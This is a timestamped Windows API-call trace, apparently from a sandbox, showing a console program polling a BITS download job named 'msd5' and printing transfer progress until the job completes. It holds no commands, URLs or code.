[0076.724] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0076.725] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0x7) returned 1
[0076.725] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.725] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc8 | out: lpConsoleScreenBufferInfo=0x8ecc8) returned 1
[0076.725] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece0*=0x8) returned 1
[0076.725] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.726] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0076.726] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0x8) returned 1
[0076.726] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.726] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.726] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0xc) returned 1
[0076.727] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.727] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0076.727] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0xa) returned 1
[0076.727] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.727] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecbc | out: lpConsoleScreenBufferInfo=0x8ecbc) returned 1
[0076.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecd4*=0xa) returned 1
[0076.728] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.728] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.728] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x8) returned 1
[0076.728] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.729] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ece8 | out: _Buffer="0") returned 1
[0076.729] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf4 | out: _Buffer="1") returned 1
[0076.729] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0076.729] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x5) returned 1
[0076.729] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.729] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0076.729] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x8) returned 1
[0076.734] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.734] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf0 | out: _Buffer="0") returned 1
[0076.735] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf4 | out: _Buffer="326656") returned 6
[0076.735] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf0 | out: _Buffer="0") returned 1
[0076.735] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ecdc | out: lpSystemTimeAsFileTime=0x8ecdc*(dwLowDateTime=0xde596d30, dwHighDateTime=0x1d469c7))
[0076.735] _finite (_X=0x0) returned 1
[0076.735] _finite (_X=0x0) returned 1
[0076.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ec9c | out: lpConsoleScreenBufferInfo=0x8ec9c) returned 1
[0076.735] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x11, lpNumberOfCharsWritten=0x8ecb4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecb4*=0x11) returned 1
[0076.735] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0076.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eca8 | out: lpConsoleScreenBufferInfo=0x8eca8) returned 1
[0076.736] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8ecc0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecc0*=0xf) returned 1
[0076.736] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0076.736] _vsnwprintf (in: _Buffer=0x8ead4, _BufferCount=0xfe, _Format="%.2f B/S", _ArgList=0x8ea98 | out: _Buffer="0.00 B/S") returned 8
[0076.736] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecec | out: lpConsoleScreenBufferInfo=0x8ecec) returned 1
[0076.736] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ed04, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ed04*=0x8) returned 1
[0076.736] CoTaskMemFree (pv=0x2383c0)
[0076.737] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 0
[0076.737] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8f688*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0077.226] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 1
[0077.226] TranslateMessage (lpMsg=0x8f660) returned 0
[0077.226] DispatchMessageW (lpMsg=0x8f660) returned 0x1
[0077.226] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0077.226] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0077.227] KillTimer (hWnd=0x0, uIDEvent=0x7fbb) returned 1
[0077.227] IBackgroundCopyJob:GetType (in: This=0x22a624, pVal=0x8ed28 | out: pVal=0x8ed28) returned 0x0
[0077.246] IBackgroundCopyJob:GetProgress (in: This=0x22a624, pVal=0x240cc0 | out: pVal=0x240cc0) returned 0x0
[0077.248] IBackgroundCopyJob:GetPriority (in: This=0x22a624, pVal=0x8ed24 | out: pVal=0x8ed24) returned 0x0
[0077.249] CoTaskMemFree (pv=0x0)
[0077.249] IBackgroundCopyJob:GetDisplayName (in: This=0x22a624, pVal=0x8ed3c | out: pVal=0x8ed3c*="msd5") returned 0x0
[0077.250] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ece4 | out: lpConsoleScreenBufferInfo=0x8ece4) returned 1
[0077.250] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8ecfc | out: lpNumberOfCharsWritten=0x8ecfc) returned 1
[0077.250] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8ecfc | out: lpNumberOfAttrsWritten=0x8ecfc) returned 1
[0077.250] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0077.250] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0077.251] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0xa) returned 1
[0077.251] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.251] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0077.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x5) returned 1
[0077.252] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.252] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0077.252] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0x7) returned 1
[0077.252] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc8 | out: lpConsoleScreenBufferInfo=0x8ecc8) returned 1
[0077.253] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece0*=0x8) returned 1
[0077.253] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.253] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd0 | out: lpConsoleScreenBufferInfo=0x8ecd0) returned 1
[0077.253] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece8*=0x8) returned 1
[0077.253] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.254] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0077.254] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xe, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0xe) returned 1
[0077.254] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.254] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecd4 | out: lpConsoleScreenBufferInfo=0x8ecd4) returned 1
[0077.254] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecec, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecec*=0xa) returned 1
[0077.255] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.255] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecbc | out: lpConsoleScreenBufferInfo=0x8ecbc) returned 1
[0077.255] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8ecd4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecd4*=0xa) returned 1
[0077.255] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.256] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0077.256] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x8) returned 1
[0077.256] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.256] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ece8 | out: _Buffer="0") returned 1
[0077.256] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf4 | out: _Buffer="1") returned 1
[0077.256] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecc4 | out: lpConsoleScreenBufferInfo=0x8ecc4) returned 1
[0077.256] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8ecdc, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecdc*=0x5) returned 1
[0077.257] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.258] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eccc | out: lpConsoleScreenBufferInfo=0x8eccc) returned 1
[0077.258] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8ece4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ece4*=0x8) returned 1
[0077.258] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.258] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf0 | out: _Buffer="63322") returned 5
[0077.258] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf4 | out: _Buffer="326656") returned 6
[0077.259] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8ecf0 | out: _Buffer="19") returned 2
[0077.259] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x8ecdc | out: lpSystemTimeAsFileTime=0x8ecdc*(dwLowDateTime=0xdea7fa90, dwHighDateTime=0x1d469c7))
[0077.259] _finite (_X=0xc4f19a81) returned 1
[0077.259] _finite (_X=0xd6a91f5a) returned 1
[0077.259] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ec9c | out: lpConsoleScreenBufferInfo=0x8ec9c) returned 1
[0077.259] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x16, lpNumberOfCharsWritten=0x8ecb4, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecb4*=0x16) returned 1
[0077.259] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.259] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eca8 | out: lpConsoleScreenBufferInfo=0x8eca8) returned 1
[0077.259] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xf, lpNumberOfCharsWritten=0x8ecc0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecc0*=0xf) returned 1
[0077.260] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.260] _vsnwprintf (in: _Buffer=0x8ead4, _BufferCount=0xfe, _Format="%.2f KB/S", _ArgList=0x8ea98 | out: _Buffer="84.08 KB/S") returned 10
[0077.260] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eca0 | out: lpConsoleScreenBufferInfo=0x8eca0) returned 1
[0077.262] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x8ecb8, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecb8*=0xb) returned 1
[0077.263] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8eca8 | out: lpConsoleScreenBufferInfo=0x8eca8) returned 1
[0077.264] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x8ecc0, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ecc0*=0x10) returned 1
[0077.264] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.264] _vsnwprintf (in: _Buffer=0x8ead4, _BufferCount=0xfe, _Format="%I64u Seconds", _ArgList=0x8ea8c | out: _Buffer="3 Seconds") returned 9
[0077.264] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8ecec | out: lpConsoleScreenBufferInfo=0x8ecec) returned 1
[0077.265] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x8ed04, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8ed04*=0x9) returned 1
[0077.265] CoTaskMemFree (pv=0x2383c0)
[0077.265] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 0
[0077.265] MsgWaitForMultipleObjectsEx (nCount=0x1, pHandles=0x8f688*=0x3, dwMilliseconds=0xffffffff, dwWakeMask=0x4ff, dwFlags=0x2) returned 0x1
[0077.732] PeekMessageW (in: lpMsg=0x8f660, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8f660) returned 1
[0077.732] TranslateMessage (lpMsg=0x8f660) returned 0
[0077.732] DispatchMessageW (lpMsg=0x8f660) returned 0x1
[0077.733] IBackgroundCopyCallback:JobTransferred (This=0x240cb0, pJob=0x22a6b4) returned 0x0
[0077.733] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0077.734] IBackgroundCopyCallback:JobModification (This=0x240cb0, pJob=0x22a6b4, dwReserved=0x0) returned 0x0
[0077.734] IBackgroundCopyJob:GetState (in: This=0x22a624, pVal=0x240cbc | out: pVal=0x240cbc) returned 0x0
[0077.734] IBackgroundCopyJob:GetType (in: This=0x22a624, pVal=0x8dc98 | out: pVal=0x8dc98) returned 0x0
[0077.737] IBackgroundCopyJob:GetProgress (in: This=0x22a624, pVal=0x240cc0 | out: pVal=0x240cc0) returned 0x0
[0077.757] IBackgroundCopyJob:GetPriority (in: This=0x22a624, pVal=0x8dc94 | out: pVal=0x8dc94) returned 0x0
[0077.773] CoTaskMemFree (pv=0x0)
[0077.773] IBackgroundCopyJob:GetDisplayName (in: This=0x22a624, pVal=0x8dcac | out: pVal=0x8dcac*="msd5") returned 0x0
[0077.789] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc54 | out: lpConsoleScreenBufferInfo=0x8dc54) returned 1
[0077.791] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x8dc6c | out: lpNumberOfCharsWritten=0x8dc6c) returned 1
[0077.794] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x8dc6c | out: lpNumberOfAttrsWritten=0x8dc6c) returned 1
[0077.795] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0077.796] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.797] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc40 | out: lpConsoleScreenBufferInfo=0x8dc40) returned 1
[0077.797] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dc58, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc58*=0xa) returned 1
[0077.797] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.797] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc3c | out: lpConsoleScreenBufferInfo=0x8dc3c) returned 1
[0077.798] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8dc54, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc54*=0x5) returned 1
[0077.798] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.798] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc44 | out: lpConsoleScreenBufferInfo=0x8dc44) returned 1
[0077.798] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x8dc5c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc5c*=0x7) returned 1
[0077.799] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc38 | out: lpConsoleScreenBufferInfo=0x8dc38) returned 1
[0077.799] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dc50, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc50*=0x8) returned 1
[0077.799] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.799] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc40 | out: lpConsoleScreenBufferInfo=0x8dc40) returned 1
[0077.800] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dc58, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc58*=0x8) returned 1
[0077.800] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.800] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc34 | out: lpConsoleScreenBufferInfo=0x8dc34) returned 1
[0077.800] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xd, lpNumberOfCharsWritten=0x8dc4c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc4c*=0xd) returned 1
[0077.801] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.801] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc44 | out: lpConsoleScreenBufferInfo=0x8dc44) returned 1
[0077.801] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dc5c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc5c*=0xa) returned 1
[0077.801] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.801] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc2c | out: lpConsoleScreenBufferInfo=0x8dc2c) returned 1
[0077.802] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x8dc44, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc44*=0xa) returned 1
[0077.802] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.802] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc34 | out: lpConsoleScreenBufferInfo=0x8dc34) returned 1
[0077.802] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x8dc4c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc4c*=0x8) returned 1
[0077.803] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0077.803] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dc58 | out: _Buffer="1") returned 1
[0077.803] _vsnwprintf (in: _Buffer=0x7a03f0, _BufferCount=0xff, _Format="%I64u", _ArgList=0x8dc64 | out: _Buffer="1") returned 1
[0077.803] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc34 | out: lpConsoleScreenBufferInfo=0x8dc34) returned 1
[0077.803] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x7943c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x8dc4c, lpReserved=0x0 | out: lpBuffer=0x7943c4*, lpNumberOfCharsWritten=0x8dc4c*=0x5) returned 1
[0077.803] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0077.803] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x8dc3c | out: lpConsoleScreenBufferInfo=0x8dc3c) returned 1
